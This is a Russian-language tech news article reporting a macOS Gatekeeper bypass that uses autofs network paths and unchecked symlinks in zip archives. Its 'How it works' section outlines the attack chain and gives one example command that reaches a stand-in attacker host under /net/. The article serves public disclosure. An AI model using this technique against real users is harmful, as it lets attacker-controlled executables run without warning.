В macOS найдена серьезная уязвимость встроенной защиты
Исследователь безопасности Филиппо Кавалларин нашел несложный способ обхода защитного инструмента Gatekeeper в macOS.
Gatekeeper проверяет наличие цифровой подписи Apple у любого приложения, загруженного не из Mac App Store. Если программа не подписана, она не запустится без прямого разрешения пользователя.
Проблема в том, что сейчас инструмент рассматривает внешние накопители и сетевые расположения как безопасные. То есть для приложений оттуда не требуется проверка подписи.
Как это работает
Для обхода защиты злоумышленнику требуется использовать:
1. Автомонтирование (autofs), которое позволяет пользователю автоматически монтировать сетевой ресурс, просто используя «специальный» путь, в данном случае любой путь, начинающийся с »/net/».
Например, «ls /net/evil-attacker.com/sharedfolder/» заставит ОС читать содержимое «sharedfolder» на удаленном хосте (evil-attacker.com).
2. Zip-архивы. Они могут содержать символические ссылки, указывающие на произвольное местоположение (включая точки автоматического монтирования). Программное обеспечение на MacOS, отвечающее за распаковку этих файлов, не выполняет никакой проверки символических ссылок перед их созданием.
Другими словами, жертва качает zip-архив, извлекает его содержимое и переходит по символической ссылке. Теперь юзер находится в месте, контролируемом злоумышленником, но которому доверяет Gatekeeper, поэтому любой контролируемый хакером исполняемый файл может быть запущен без предупреждения.
Кавалларин сообщил Apple об этой уязвимости в феврале 2019 года, но даже в macOS 10.14.15 компания её не закрыла и перестала отвечать разработчику. Поэтому он опубликовал результаты проверки в открытом доступе. [9to5]